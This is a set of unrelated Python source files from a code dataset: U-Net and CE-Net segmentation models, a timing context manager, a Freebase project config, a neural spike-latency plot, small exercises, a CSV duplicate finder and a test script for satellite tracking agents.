), # padding and stride \n double_depth_conv(in_ch, out_ch)\n )\n\n def forward(self, x):\n x = self.strided_conv(x) \n return x\n\n\nclass up(nn.Module):\n def __init__(self, in_ch, out_ch, bilinear=True):\n super(up, self).__init__()\n if bilinear:\n self.up = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)\n else:\n self.up = nn.ConvTranspose2d(in_ch // 2, in_ch // 2, 2, stride=2)\n\n self.conv = double_depth_conv(in_ch, out_ch)\n\n def forward(self, x1, x2):\n x1 = self.up(x1) \n x = adjustpad_cat(x1, x2)\n x = self.conv(x)\n return x\n\n\nclass outconv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(outconv, self).__init__()\n self.conv = nn.Conv2d(in_ch, out_ch, kernel_size=1)\n\n def forward(self, x):\n x = self.conv(x)\n return x\n\nclass conv_block(nn.Module):\n def __init__(self,ch_in,ch_out):\n 
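# two (conv3x3 + BN + ReLU) layers; the basic block used by AttU_Net below\n        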
super(conv_block,self).__init__()\n        self.conv = nn.Sequential(\n            nn.Conv2d(ch_in, ch_out, kernel_size=3,stride=1,padding=1,bias=True),\n            nn.BatchNorm2d(ch_out),\n            nn.ReLU(), \n            nn.Conv2d(ch_out, ch_out, kernel_size=3,stride=1,padding=1,bias=True),\n            nn.BatchNorm2d(ch_out),\n            nn.ReLU() \n        )\n\n\n    def forward(self,x):\n        x = self.conv(x)\n        return x\n\n\nclass up_conv(nn.Module):\n    def __init__(self,ch_in,ch_out):\n        super(up_conv,self).__init__()\n        self.up = nn.Sequential(\n            nn.Upsample(scale_factor=2),\n            nn.Conv2d(ch_in,ch_out,kernel_size=3,stride=1,padding=1,bias=True),\n            nn.BatchNorm2d(ch_out),\n            nn.ReLU() \n        )\n\n    def forward(self,x):\n        x = self.up(x)\n        return x\n\nclass Attention_block(nn.Module):\n    def __init__(self,F_g,F_l,F_int):\n        super(Attention_block,self).__init__()\n        self.W_g = nn.Sequential(\n            nn.Conv2d(F_g, F_int, kernel_size=1,stride=1,padding=0,bias=True),\n            nn.BatchNorm2d(F_int)\n            )\n        \n        self.W_x = nn.Sequential(\n            nn.Conv2d(F_l, F_int, kernel_size=1,stride=1,padding=0,bias=True),\n            nn.BatchNorm2d(F_int)\n        )\n\n        self.psi = nn.Sequential(\n            nn.Conv2d(F_int, 1, kernel_size=1,stride=1,padding=0,bias=True),\n            nn.BatchNorm2d(1) \n        )\n        \n        self.relu = nn.ReLU(inplace=True)\n        \n    def forward(self,g,x):\n        g1 = self.W_g(g) \n        x1 = self.W_x(x) \n        x = adjustpad_add(x1, g1) # played around\n        psi = self.relu(x) \n        psi = self.psi(psi)\n\n        return x*psi\n\n\n\nclass AttU_Net(nn.Module):\n    def __init__(self,img_ch=3,output_ch=1):\n        super(AttU_Net,self).__init__()\n        \n        self.Maxpool = nn.MaxPool2d(kernel_size=2,stride=2)\n\n        self.Conv1 = conv_block(ch_in=img_ch,ch_out=64)\n        self.Conv2 = conv_block(ch_in=64,ch_out=128)\n        self.Conv3 = conv_block(ch_in=128,ch_out=256)\n        self.Conv4 = conv_block(ch_in=256,ch_out=512)\n        self.Conv5 = conv_block(ch_in=512,ch_out=1024)\n\n        self.Up5 = up_conv(ch_in=1024,ch_out=512)\n        self.Att5 = Attention_block(F_g=512,F_l=512,F_int=256)\n        self.Up_conv5 = conv_block(ch_in=1024, ch_out=512)\n\n        self.Up4 = up_conv(ch_in=512,ch_out=256)\n        self.Att4 = Attention_block(F_g=256,F_l=256,F_int=128)\n        self.Up_conv4 = conv_block(ch_in=512, ch_out=256)\n        \n        self.Up3 = up_conv(ch_in=256,ch_out=128)\n        self.Att3 = Attention_block(F_g=128,F_l=128,F_int=64)\n        self.Up_conv3 = conv_block(ch_in=256, ch_out=128)\n        \n        self.Up2 = up_conv(ch_in=128,ch_out=64)\n        self.Att2 = Attention_block(F_g=64,F_l=64,F_int=32)\n        self.Up_conv2 = conv_block(ch_in=128, ch_out=64)\n\n        self.Conv_1x1 = nn.Conv2d(64,output_ch,kernel_size=1,stride=1,padding=0)\n\n\n    def forward(self,x):\n        # encoding path\n        x1 = self.Conv1(x)\n\n        x2 = self.Maxpool(x1)\n        x2 = self.Conv2(x2)\n        \n        x3 = self.Maxpool(x2)\n        x3 = self.Conv3(x3)\n\n        x4 = self.Maxpool(x3)\n        x4 = self.Conv4(x4)\n\n        x5 = self.Maxpool(x4)\n        x5 = self.Conv5(x5)\n\n        # decoding + concat path\n        d5 = self.Up5(x5) \n        x4 = self.Att5(g=d5,x=x4) \n        d5 = torch.cat((x4,d5),dim=1)  # bug fix: concat was missing; Up_conv5 expects 1024 input channels (also removed leftover pdb.set_trace())\n        d5 = self.Up_conv5(d5)\n        \n        d4 = self.Up4(d5)\n        x3 = self.Att4(g=d4,x=x3)\n        d4 = torch.cat((x3,d4),dim=1)\n        d4 = self.Up_conv4(d4)\n\n        d3 = self.Up3(d4)\n        x2 = self.Att3(g=d3,x=x2)\n        d3 = torch.cat((x2,d3),dim=1)\n        d3 = self.Up_conv3(d3)\n\n        d2 = self.Up2(d3)\n        x1 = self.Att2(g=d2,x=x1)\n        d2 = torch.cat((x1,d2),dim=1)\n        d2 = self.Up_conv2(d2)\n\n        d1 = self.Conv_1x1(d2)\n\n        out = d1\n\n        return out\n\nclass mod_u(nn.Module):\n    def __init__(self, n_channels=3, n_classes=1):\n        super(mod_u, self).__init__()\n        self.inc = inconv(n_channels, 64)\n        self.down1 = down(64, 128)\n        self.down2 = down(128, 256)\n        self.down3 = down(256, 512)\n        self.down4 = down(512, 512)\n\n        # center \n        # self.dblock = 
DACblock_mod(512)\n        # self.incep = inception(512) \n\n        self.up1 = up(1024, 256)\n        self.up2 = up(512, 128)\n        self.up3 = up(256, 64)\n        self.up4 = up(128, 64)\n        self.outc = outconv(64, n_classes)\n        self.relu = nn.ReLU()  # bug fix: was commented out but forward() calls self.relu\n\n    def forward(self, x):\n        x1 = self.inc(x)\n        x2 = self.down1(x1)\n        x3 = self.down2(x2)\n        x4 = self.down3(x3)\n        x5 = self.down4(x4)\n        \n        # center # atrous_conv \n        # x5 = self.dblock(x5)\n        # x block \n        # x5 = self.incep(x5)\n\n        x = self.up1(x5, x4)\n        x = self.up2(x, x3)\n        x = self.up3(x, x2)\n        x = self.up4(x, x1)\n        x = self.outc(x)\n        x = self.relu(x) # is relu req? # can exp \n        return x \n    \nclass UNet(nn.Module):\n    def __init__(self, n_channels=3, n_classes=1):\n        super(UNet, self).__init__()\n        self.inc = inconv(n_channels, 16)\n        self.down1 = down(16, 32)\n        self.down2 = down(32, 64)\n        self.down3 = down(64, 128)\n        self.down4 = down(128, 256)\n        self.up1 = up(256, 128)\n        self.up2 = up(128, 64)\n        self.up3 = up(64,32)\n        self.up4 = up(32, 16)\n        self.outc = outconv(16, n_classes)\n        self.relu = nn.ReLU()\n\n    def forward(self, x):\n        x1 = self.inc(x)\n        x2 = self.down1(x1)\n        x3 = self.down2(x2)\n        x4 = self.down3(x3)\n        x5 = self.down4(x4)\n        x = self.up1(x5, x4)\n        x = self.up2(x, x3)\n        x = self.up3(x, x2)\n        x = self.up4(x, x1)\n        x = self.outc(x) \n        return x\n\n\nclass mod_ce(nn.Module):\n    def __init__(self, num_classes= 1, num_channels=3):\n        super(mod_ce, self).__init__()\n\n        filters = [64, 128, 256, 512]\n        # filters = [16, 32, 64, 128]\n        resnet = models.resnet34(pretrained=True) \n        # self.firstconv = resnet.conv1 \n        self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7,7), stride=(2,2), padding=(3,3), bias = False) # change for having input channels = 19\n\n        self.firstbn = resnet.bn1 \n        self.firstmaxpool = resnet.maxpool\n        self.encoder1 = resnet.layer1\n        self.encoder2 = resnet.layer2\n        self.encoder3 = resnet.layer3 \n        self.encoder4 = resnet.layer4\n        \n        self.dblock = DACblock(512) \n        self.spp = SPPblock(512) \n\n        self.decoder4 = DecoderBlock(512, filters[2]) \n        self.decoder3 = DecoderBlock(filters[2], filters[1])\n        self.decoder2 = DecoderBlock(filters[1], filters[0])\n        self.decoder1 = DecoderBlock(filters[0], filters[0])\n        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 4, 2, 1)\n        self.finalconv2 = nn.Conv2d(32, 32, 3, padding=1)\n        self.finalconv3 = nn.Conv2d(32, num_classes, 3, padding=1) \n        self.relu = nn.ReLU()\n\n    def forward(self, x):\n        # Encoder\n        \n        x = self.firstconv(x)\n        x = self.firstbn(x)\n        x = self.firstmaxpool(x) \n        x = self.relu(x) \n        \n        e1 = self.encoder1(x) \n        e2 = self.encoder2(e1)\n        e3 = self.encoder3(e2)\n        e4 = self.encoder4(e3)\n        \n        # Center \n        \n        e4 = self.dblock(e4) \n        \n        # DAC only \n\n        # Decoder\n        d4 = self.decoder4(e4) + e3 \n        d3 = adjustpad_add(e2, self.decoder3(d4))\n        d2 = adjustpad_add(e1, self.decoder2(d3))\n        # d3 = self.decoder3(d4) + e2\n        # d2 = self.decoder2(d3) + e1\n        d1 = self.decoder1(d2)\n\n        out = self.finaldeconv1(d1)\n        out = self.relu(out)\n        out = self.finalconv2(out)\n        out = self.relu(out)\n        out = self.finalconv3(out)\n        return out\n\n\nclass CE_Net_(nn.Module):\n    def __init__(self, num_classes= 1, num_channels=3):\n        super(CE_Net_, self).__init__()\n\n        filters = [64, 128, 256, 512]\n        resnet = models.resnet34(pretrained=True) \n        # self.firstconv = resnet.conv1 \n        self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7,7), stride=(2,2), padding=(3,3), bias = False) # change for having input channels = 19\n        self.firstbn = resnet.bn1\n        self.firstrelu = resnet.relu\n        self.firstmaxpool = resnet.maxpool\n        self.encoder1 = resnet.layer1\n        
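# remaining pretrained ResNet-34 stages complete the encoder\n        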
self.encoder2 = resnet.layer2\n self.encoder3 = resnet.layer3\n self.encoder4 = resnet.layer4\n\n self.dblock = DACblock(512)\n self.spp = SPPblock(512)\n\n self.decoder4 = DecoderBlock(516, filters[2])\n self.decoder3 = DecoderBlock(filters[2], filters[1])\n self.decoder2 = DecoderBlock(filters[1], filters[0])\n self.decoder1 = DecoderBlock(filters[0], filters[0])\n\n self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 4, 2, 1)\n self.finalrelu1 = nonlinearity\n self.finalconv2 = nn.Conv2d(32, 32, 3, padding=1)\n self.finalrelu2 = nonlinearity\n self.finalconv3 = nn.Conv2d(32, num_classes, 3, padding=1)\n\n def forward(self, x):\n # Encoder\n x = self.firstconv(x)\n x = self.firstbn(x)\n x = self.firstrelu(x)\n x = self.firstmaxpool(x)\n e1 = self.encoder1(x)\n e2 = self.encoder2(e1)\n e3 = self.encoder3(e2)\n e4 = self.encoder4(e3)\n\n # Center\n e4 = self.dblock(e4)\n e4 = self.spp(e4)\n\n # Decoder\n d4 = self.decoder4(e4) + e3 \n d3 = adjustpad_add(e2, self.decoder3(d4))\n d2 = adjustpad_add(e1, self.decoder2(d3))\n \n # d4 = self.decoder4(e4) + e3\n # d3 = self.decoder3(d4) + e2\n # d2 = self.decoder2(d3) + e1\n d1 = self.decoder1(d2)\n\n out = self.finaldeconv1(d1)\n out = self.finalrelu1(out)\n out = self.finalconv2(out)\n out = self.finalrelu2(out)\n out = self.finalconv3(out) \n return out\n\n\n\n\n# import os; os.environ['CUDA_VISIBLE_DEVICES'] = '0' \n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") \n\n# # model = mod_u(n_channels=19, n_classes=19).to(device) # not working on GPU \n# # model = UNet(n_channels=19, n_classes=19).to(device) # not working on GPU\n# # model = AttU_Net(img_ch=19, output_ch=19).to(device) \n# # model = mod_ce(num_classes=19, num_channels=19).to(device) \n# model = CE_Net_(num_classes=19, num_channels=19).to(device) \n\n# summary( model, (19, 512, 512))\n","repo_name":"Siddharth-Shrivastava7/Prior-Net-Segcorrection","sub_path":"old_trying/model/unet_models_btech.py","file_name":"unet_models_btech.py","file_ext":"py","file_size_in_byte":21093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14865912745","text":"import time\n\n\nclass CodeTimer:\n def __init__(self):\n self.start = None\n\n def __enter__(self):\n self.start = time.time()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # print(exc_type)\n # print(exc_tb)\n # print(exc_val)\n t = time.time() - self.start\n print('Итого время работы составило', t, 'сек')\n return True\n\ntimer = CodeTimer()\n\nwith timer:\n l = [i for i in range(100)]\n l[101]\n 5 + 'a'\n","repo_name":"Night575/4_module","sub_path":"1221/Module_3/3_les_5/context_m.py","file_name":"context_m.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29414422668","text":"# DB\ndialect = \"mysql\"\ndriver = \"mysqlconnector\"\nhost = \"localhost\"\nport = \"8889\"\nusername = \"freebase\"\npassword = \"freebase\"\ndatabase = \"freebase\"\nDB_URI = f\"{dialect}+{driver}://{username}:{password}@{host}:{port}/{database}\"\nBASE_URL = \"Freebase\"\n\n# FEATURES TUNING\nTHRESHOLD = 0.7\nTOP_N_FEATURES = 5\n\n# SOURCE\nLOOKUP = 'lookup'\nTARGET = 'target'\nDATASET_DIR = '{PATH}/AFEGKG/datasets/'\nSOURCE_PATH = '{PATH}/freebase-rdf-latest.gz'\n\nALLOWED_ENTITIES = {\n '/music/': 'music',\n '/film/': 'film',\n '/tv/': 'tv',\n '/location/': 'location',\n '/people/': 'people',\n '/measurement_unit/': 'measurement_unit',\n '/book/': 'book',\n 
'/media_common/': 'media_common',\n '/medicine/': 'medicine',\n '/award/': 'award',\n '/biology/': 'biology',\n '/sports/': 'sports',\n '/organization/': 'organization',\n '/education/': 'education',\n '/baseball/': 'baseball',\n '/business/': 'business',\n '/imdb/': 'imdb',\n '/government/': 'government',\n '/cvg/': 'cvg',\n '/soccer/': 'soccer',\n '/time/': 'time',\n '/astronomy/': 'astronomy',\n '/basketball/': 'basketball',\n '/american_football/': 'american_football',\n '/olympics/': 'olympics',\n '/fictional_universe/': 'fictional_universe',\n '/theater/': 'theater',\n '/visual_art/': 'visual_art',\n '/military/': 'military',\n '/protected_sites/': 'protected_sites',\n '/geography/': 'geography',\n '/broadcast/': 'broadcast',\n '/architecture/': 'architecture',\n '/food/': 'food',\n '/aviation/': 'aviation',\n '/finance/': 'finance',\n '/transportation/': 'transportation',\n '/boats/': 'boats',\n '/computer/': 'computer',\n '/royalty/': 'royalty',\n '/library/': 'library',\n '/internet/': 'internet',\n '/wine/': 'wine',\n '/projects/': 'projects',\n '/chemistry/': 'chemistry',\n '/cricket/': 'cricket',\n '/travel/': 'travel',\n '/symbols/': 'symbols',\n '/religion/': 'religion',\n '/influence/': 'influence',\n '/language/': 'language',\n '/community/': 'community',\n '/metropolitan_transit/': 'metropolitan_transit',\n '/automotive/': 'automotive',\n '/digicams/': 'digicams',\n '/law/': 'law',\n '/exhibitions/': 'exhibitions',\n '/tennis/': 'tennis',\n '/venture_capital/': 'venture_capital',\n '/opera/': 'opera',\n '/comic_books/': 'comic_books',\n '/amusement_parks/': 'amusement_parks',\n '/dining/': 'dining',\n '/ice_hockey/': 'ice_hockey',\n '/event/': 'event',\n '/spaceflight/': 'spaceflight',\n '/zoo/': 'zoo',\n '/meteorology/': 'meteorology',\n '/martial_arts/': 'martial_arts',\n '/periodicals/': 'periodicals',\n '/games/': 'games',\n '/celebrities/': 'celebrities',\n '/nytimes/': 'nytimes',\n '/rail/': 'rail',\n '/interests/': 'interests',\n '/atom/': 'atom',\n '/boxing/': 'boxing',\n '/comic_strips/': 'comic_strips',\n '/conferences/': 'conferences',\n '/skiing/': 'skiing',\n '/engineering/': 'engineering',\n '/fashion/': 'fashion',\n '/radio/': 'radio',\n '/distilled_spirits/': 'distilled_spirits',\n '/chess/': 'chess',\n '/physics/': 'physics',\n '/geology/': 'geology',\n '/bicycles/': 'bicycles',\n '/comedy/': 'comedy'\n}\n\nNOT_ALLOWED_TYPES = ['type', '/common/topic/topic_equivalent_webpage', '/type/object/key', '/wikipedia/en', '/en',\n '/common/topic/alias', '/common/topic/official_website', '/common/topic/topical_webpage',\n '/common/topic/webpage', '/common/topic/image', '/common/topic/webpage',\n '/common/topic/notable_types']\n","repo_name":"abuajaj/automatic-feature-engineering-gkg","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25684102763","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 23 21:41:41 2018\n\n@author: Stav\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom get_hist_sdf import get_hist_sdf\nfrom print_info import print_info\n\ndef time_in_ms_to_index(ms_time):\n return ms_time + 100\n\ndef index_to_time_in_ms(arr_ind):\n return float(arr_ind)/float(1000)\n\ndef plot_spike_train_sdf_with_latency(spike_train, fig_path):\n number_of_std = 3\n window_in_ms = float(10) # 5\n first_possible_response = 50\n start_window_in_ms = float(-100)\n end_window_in_ms = float(250)\n 
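# convert the smoothing window to seconds to match the time axis of the plot\n    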
window_in_secs = window_in_ms/float(1000)\n min_range = int(float(-100)/window_in_ms)\n max_range = int(float(250)/window_in_ms + 1)\n\n x_axis_values = [float(x)/float(1000) for x in range(min_range*int(window_in_ms), (max_range-1)*int(window_in_ms))]\n\n fig,ax = plt.subplots(1,1,figsize=(6,3))\n\n sdfs = np.zeros((len(spike_train), int(end_window_in_ms-start_window_in_ms)))\n for row_ind, row in enumerate(spike_train):\n sdf = get_hist_sdf(row)\n sdfs[row_ind, :] = sdf\n mean_sdf = sdfs.mean(axis=0)\n\n max_sdf_val = mean_sdf.max()\n ax.set_ylim([0, max_sdf_val])\n num_of_trains = len(spike_train)\n y_spike_locations = [(max_sdf_val/float(num_of_trains))*x for x in range(num_of_trains)]\n\n for r_ind, row in enumerate(spike_train):\n ax.plot(row, y_spike_locations[r_ind]*np.ones_like(row),'|',color='b')\n\n plt.plot(x_axis_values, mean_sdf, color='black')\n\n zero_ind = time_in_ms_to_index(0)\n pre_stimulus_vals = mean_sdf[:zero_ind]\n post_stimulus_val = mean_sdf[zero_ind:]\n\n pre_std_val = np.std(pre_stimulus_vals)\n pre_mean_val = np.mean(pre_stimulus_vals)\n positive_threshold = pre_mean_val + number_of_std*pre_std_val\n negative_threshold = pre_mean_val + -1*number_of_std*pre_std_val\n post_stimulus_arr = np.array(post_stimulus_val)\n\n first_occur = -1\n pos_first_occur = -1\n neg_first_occur = -1\n\n if post_stimulus_arr.max() > positive_threshold:\n pos_first_occur = np.argmax(post_stimulus_arr > positive_threshold)\n\n if post_stimulus_arr.min() < negative_threshold:\n neg_first_occur = np.argmax(post_stimulus_arr < negative_threshold)\n\n if pos_first_occur > -1 and neg_first_occur > -1:\n if pos_first_occur < neg_first_occur:\n first_occur = pos_first_occur\n plt.axvline(x=index_to_time_in_ms(first_occur), color='green',alpha=0.5) \t\t\n else:\n first_occur = neg_first_occur\n plt.axvline(x=index_to_time_in_ms(first_occur), color='red',alpha=0.5) \t\t\n else:\n if pos_first_occur > -1:\n first_occur = pos_first_occur\n plt.axvline(x=index_to_time_in_ms(first_occur), color='green',alpha=0.5) \t\t \t\t\n elif neg_first_occur > -1:\n first_occur = neg_first_occur\n plt.axvline(x=index_to_time_in_ms(first_occur), color='red',alpha=0.5)\n\n ax.axvspan(start_window_in_ms/float(1000),0,color='gray',alpha=0.2)\n ax.set_xlim([start_window_in_ms/float(1000), end_window_in_ms/float(1000)])\n\n fig.savefig(fig_path)\n\n response_time = float('nan')\n if first_occur > -1:\n response_time = zero_ind+first_occur\n\n return response_time","repo_name":"StavHertz/MindReading","sub_path":"Stav/Latency/plot_spike_train_sdf_with_latency.py","file_name":"plot_spike_train_sdf_with_latency.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17659875868","text":"def sorting_cheeses(**kwargs):\n current_string = \"\"\n sorted_cheeses = sorted(kwargs.items(), key=lambda x: (-len(x[1]), (x[0])))\n\n for keys, values in sorted_cheeses:\n current_string += keys + '\\n'\n current_string += '\\n'.join(str(ch) for ch in sorted(values, reverse=True)) + '\\n'\n return current_string\n\n\nprint(sorting_cheeses(\n Parmesan=[102, 120, 135],\n Camembert=[100, 100, 105, 500, 430],\n Mozzarella=[50, 125],)\n)","repo_name":"AlexanderBedrosyan/Programming-Advanced-with-Python","sub_path":"Functions Advanced - Lab/cheese_showcase.py","file_name":"cheese_showcase.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} 
+{"seq_id":"16638603850","text":"import pandas as pd\nimport tkinter as tk\nfrom tkinter import filedialog\n\n# Define the dark theme colors for the resulting window\nbg_color = \"#333333\"\nfg_color = \"#FFFFFF\"\n\ndef select_file():\n # Open a dialog box to select the CSV file\n file_path = filedialog.askopenfilename(title=\"Select a CSV file\", filetypes=((\"CSV files\", \"*.csv\"),))\n if file_path:\n process_csv(file_path)\n\ndef process_csv(file_path):\n # Read the CSV file using pandas\n df = pd.read_csv(file_path)\n\n # Prompt the user to enter the column name for finding duplicates\n column_name = input_box.get()\n\n # Find the duplicated values in the specified column and store them in a new dataframe\n duplicates = df[df.duplicated([column_name], keep=False)]\n\n # Remove the duplicates from the original dataframe\n df = df.drop_duplicates([column_name], keep=False)\n\n # Write the duplicated values to a new CSV file\n duplicates.to_csv('duplicates.csv', index=False)\n\n # Write the unique values to another CSV file\n df.to_csv('unique.csv', index=False)\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"🔍️ Duplicate Finder\")\nroot.configure(background=bg_color)\n\n# Set the window size\nwindow_width = 300\nwindow_height = 150\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\nx = (screen_width // 2) - (window_width // 2)\ny = (screen_height // 2) - (window_height // 2)\nroot.geometry(f\"{window_width}x{window_height}+{x}+{y}\")\n\n# Create a label and text box for the column name input\ninput_label = tk.Label(root, text=\"Enter the column name:\", foreground=fg_color, background=bg_color)\ninput_label.pack(pady=10)\n\ninput_box = tk.Entry(root, width=30, bg=bg_color, fg=fg_color)\ninput_box.pack(pady=5)\n\n# Create a button to select the CSV file\nselect_button = tk.Button(root, text=\"Select File\", command=select_file, bg=bg_color, fg=fg_color)\nselect_button.pack(pady=10)\n\n# Start the main event loop\nroot.mainloop()","repo_name":"jotaguerrero/python-scripts-toolkit","sub_path":"python/drop-n-save-duplicates.py","file_name":"drop-n-save-duplicates.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2369326689","text":"\"\"\"Test for agents module.\"\"\"\n# %% Imports\n\n# Standard Library Imports\nimport json\nfrom copy import deepcopy\n\n# Third Party Imports\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom numpy import array, asarray, eye, linspace, sqrt, zeros\n\n# Punch Clock Imports\nfrom punchclock.common.agents import Agent, Sensor, Target, buildRandomAgent\nfrom punchclock.common.constants import getConstants\nfrom punchclock.common.transforms import ecef2eci\nfrom punchclock.dynamics.dynamics_classes import (\n SatDynamicsModel,\n StaticTerrestrial,\n)\nfrom punchclock.estimation.ukf_v2 import UnscentedKalmanFilter\n\n# %% Build Filter\nprint(\"Build target_filter...\")\ndummy_dynamics = SatDynamicsModel()\nsat_dynamics = SatDynamicsModel()\nground_dynamics = StaticTerrestrial()\n\n\ndef dummyMeasurementDynamics(a):\n \"\"\"Dummy dynamics.\"\"\"\n return a.reshape([6, 1])\n\n\nest_x_inital = array([[7000, 0, 0, 0, 2, 0]]).transpose()\nest_p_initial = 1 * eye(6)\nr = 0.1 * eye(6)\nq = 0.01 * eye(6)\nmy_filter = UnscentedKalmanFilter(\n time=0,\n est_x=est_x_inital,\n est_p=est_p_initial,\n dynamics_model=dummy_dynamics,\n measurement_model=dummyMeasurementDynamics,\n q_matrix=q,\n r_matrix=r,\n)\n\n\n# %% 
Basic Tests\nprint(\"Instantiation tests...\")\n\na = Agent(\n dynamics_model=sat_dynamics,\n init_eci_state=array([1, 2, 3, 4, 5, 6]),\n agent_id=\"A\",\n)\nprint(f\"Satellite agent: vars(agent) = \\n{vars(a)}\\n\")\n\nc = Sensor(\n dynamics_model=ground_dynamics,\n init_eci_state=array([1, 2, 3, 4, 5, 6]),\n agent_id=\"A\",\n time=5,\n)\nprint(f\"Ground agent: vars(ground sensor) = \\n{vars(c)}\\n\")\n\nc.propagate(10)\nprint(f\"vars(ground sensor) after updating dynamics= \\n{vars(c)}\\n\")\n\nmu = getConstants()[\"mu\"]\nd = Agent(\n dynamics_model=sat_dynamics,\n init_eci_state=array([7000, 0, 0, 0, sqrt(mu / 7000), 0]),\n agent_id=\"derSat\",\n)\nprint(f\"New satellite agent: vars(sat agent) = \\n{vars(d)}\\n\")\n\nd.propagate(10)\nprint(\n f\"New satellite agent: vars(sat agent) after updating dynamics = \\n{vars(d)}\\n\"\n)\n\n# %% Test get measurement\nprint(\"Test getMeasurement...\")\ne = Target(\n dynamics_model=sat_dynamics,\n init_eci_state=array([1, 2, 3, 4, 5, 6]),\n agent_id=2,\n target_filter=deepcopy(my_filter),\n)\nprint(\"Test with noise\")\nprint(f\" true state = {e.eci_state}\")\nprint(f\" measured state = \\n{e.getMeasurement()}\")\n\n# Test with no noise\nno_noise_filter = UnscentedKalmanFilter(\n time=0,\n est_x=est_x_inital,\n est_p=est_p_initial,\n dynamics_model=dummy_dynamics,\n measurement_model=dummyMeasurementDynamics,\n q_matrix=q,\n r_matrix=zeros([6, 6]),\n)\ne1 = Target(\n dynamics_model=sat_dynamics,\n init_eci_state=array([1, 2, 3, 4, 5, 6]),\n agent_id=2,\n target_filter=no_noise_filter,\n)\nprint(\"Test without noise\")\nprint(f\" true state = {e1.eci_state}\")\nprint(f\" measured state = \\n{e1.getMeasurement()}\")\nprint(\n f\" truth - measured = {asarray(e1.eci_state).squeeze() - e1.getMeasurement()}\"\n)\n# %% Test Propagation over multiple iterations\nprint(\"\\nTest Propagation over multiple iterations...\")\n\nx0_ecef = array([[7000, 0, 0, 0, 0, 0]]).transpose()\nx0_eci = ecef2eci(x0_ecef, 0)\nag_ground = Sensor(\n dynamics_model=StaticTerrestrial(),\n agent_id=\"A\",\n init_eci_state=x0_eci,\n)\nag_space = Sensor(\n dynamics_model=SatDynamicsModel(),\n agent_id=\"B\",\n init_eci_state=array([[8000, 1000, 0, 8, 0, 0]]).transpose(),\n)\n\ntime_vec = linspace(5, 5000)\nx_hist_ground = zeros([6, len(time_vec)])\nx_hist_space = zeros([6, len(time_vec)])\n\nfor i, t in enumerate(time_vec):\n ag_ground.propagate(t)\n ag_space.propagate(t)\n x_hist_ground[:, i] = ag_ground.eci_state.squeeze()\n x_hist_space[:, i] = ag_space.eci_state.squeeze()\n\n\nfig, ax = plt.subplots(2)\nax[0].plot(time_vec, x_hist_ground[:3, :].transpose())\nax[0].set_title(\"ground\")\nax[1].plot(time_vec, x_hist_space[:3, :].transpose())\nax[1].set_title(\"space\")\nplt.tight_layout()\n# %% Filter Tests\nprint(\"\\nFilter tests...\")\n# Functionality test\nprint(\" functionality test\")\nb = Target(\n dynamics_model=sat_dynamics,\n init_eci_state=array([7000, 0, 0, 0, 4, 0]),\n agent_id=2,\n target_filter=deepcopy(my_filter),\n time=0,\n)\nprint(f\"Target: vars(sat target) = \\n{vars(b)}\\n\")\nprint(f\"Target state: b.eci_state = \\n{b.eci_state}\")\n\n# targets must be tasked after state propagation\nprint(\" test propagation\")\nb.propagate(10)\nprint(f\"Target state after propagating: b.eci_state = \\n{b.eci_state}\")\n\n# test update nonphysical with tasking\nprint(\" test updateNonPhyiscal with tasking\")\nb.updateNonPhysical(task=True)\n\nprint(\"\\nrelevant vars(sat target) after nonphysical update with tasking:\")\nprint(f\"target.time = 
{b.time}\")\nprint(f\"target.num_tasked = {b.num_tasked}\")\nprint(f\"target.last_time_tasked = {b.last_time_tasked}\")\nprint(f\"target.target_filter.time = {b.target_filter.time}\")\nprint(f\"target.target_filter.est_x = \\n{b.target_filter.est_x}\")\n\n# test update nonphysical without tasking\nprint(\" test updateNonPhysical w/o tasking\")\nb.propagate(20)\nb.updateNonPhysical(task=False)\n\nprint(\"\\nrelevant vars(sat target) after nonphysical update without tasking:\")\nprint(f\"target.time = {b.time}\")\nprint(f\"target.num_tasked = {b.num_tasked}\")\nprint(f\"target.last_time_tasked = {b.last_time_tasked}\")\nprint(f\"target.target_filter.time = {b.target_filter.time}\")\nprint(f\"target.target_filter.est_x = \\n{b.target_filter.est_x}\")\n\n# test error catcher\nprint(\" Test updateNonPhysical with bad input\")\ntry:\n    b.updateNonPhysical()\nexcept TypeError as err:\n    print(err)\n\n# test second tasking\nprint(\" Test 2nd tasking\")\nb.propagate(60)\nb.updateNonPhysical(task=True)\nprint(\"\\nrelevant vars(sat target) after updating dynamics and tasking again:\")\nprint(f\"target.time = {b.time}\")\nprint(f\"target.num_tasked = {b.num_tasked}\")\nprint(f\"target.last_time_tasked = {b.last_time_tasked}\")\nprint(f\"target.target_filter.time = {b.target_filter.time}\")\nprint(f\"target.eci_state = \\n{b.eci_state}\")\nprint(f\"target.target_filter.est_x = \\n{b.target_filter.est_x}\")\n\n# %% Test toJson\nprint(\"\\ntoJson...\")\n# assign attributes to be numpy dtypes to test conversion to python types\nc.last_time_tasked = np.float32(2.2)\nc.num_tasked = np.int64(10)\njson_dict = c.toDict()\n\n# check to make sure json can be dumped\njson_object = json.dumps(json_dict)\n\n# 